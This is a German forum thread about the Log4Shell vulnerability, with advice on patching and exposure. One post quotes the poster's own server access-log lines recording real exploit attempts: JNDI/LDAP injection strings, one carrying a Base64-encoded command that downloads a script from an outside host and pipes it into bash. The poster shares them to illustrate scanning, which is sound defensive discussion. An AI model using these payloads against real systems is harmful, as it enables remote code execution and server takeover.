Log4Shell - und ihr so?

Registriert
26. Juli 2015
Reaktionspunkte
6.436

10 Tage zu spät dran ;)

Für den klassischen Heimanwender ist das eher irrelevant, Java Anwendungen unter Windows + extern kontrollierbarer Input ist da ja nicht so gängig. Interessant wird's halt für alles was du irgendwie an Server-Diensten ins Internet anbietest. Minecraft Server z.B. https://winfuture.de/news,127072.html
 
Zuletzt bearbeitet:
naja die augen aufhalten nach sicherheits updates sollte jeder - jetzt besonders. und bei einem system ohne paketverwaltung ist das etwas nerviger.
Das üblie ist, dass man i.E. wenig machen kann ausser warten und hoffen.
 
Für Admins (hier) und welche die sich auch nur so nennen, ggf. ganz hilfreich. :cool:

Wenn du das wirklich ernsthaft machen willst ist das 10 Tage zu spät. Kollegen hatten letzten Freitag/Samstag angefangen mit den möglichen Mitigations + Hersteller-Support zu klären bzw. entsprechende Patches einzuspielen, selbst Oracle hatte noch am Wochenende
"Impact of December 2021 Apache Log4j Vulnerabilities on Oracle Products and Services (CVE-2021-44228, CVE-2021-45046) (Doc ID 2827611.1)" veröffentlich, die Liste für alle halbwegs relevanten Produkte war Mitte letzter Woche schon ziemlich geklärt (not affected bzw. eine weitere Support-Note mit Patch o.ä.).
Ich hab ja privat bisschen Hardware mit Webserver etc. laufen und im accesslog waren diese beiden Einträge die ersten Versuche vom exploit:

147.x.y.z - - [10/Dec/2021:16:32:42 +0100] "GET / HTTP/1.1" 301 247 "-" "${j.n.d.i:l.d.a.p://134.a.b.c/callback/}"
45.a.b.c - - [10/Dec/2021:19:11:42 +0100] "GET / HTTP/1.1" 301 247 "-" "${j.n.d.i:l.d.a.p://45.x.y.z:12344/Basic/Command/Base64/KGN1cmwgLXMgNDUuMTU1LjIwNS4yMzM6NTg3NC8yMTMuOTUuMjEuNjA6ODB8fHdnZXQgLXEgLU8tIDQ1LjE1NS4yMDUuMjMzOjU4NzQvMjEzLjk1LjIxLjYwOjgwKXxiYXNo}"

sprich vollkommen random "da läuft ein Webserver, probieren wir aus ob das funktioniert", wenn ich irgendwo ein log4j in den Untiefen meines Apache hätte wäre die Kiste vermutlich jetzt gerootet.

und tante Edit sagt, auch das Forum hat wohl schon ihren Parser aufgebohrt, der alle jndi::ldap Dinge filtert...
 
Zurück
Oben Unten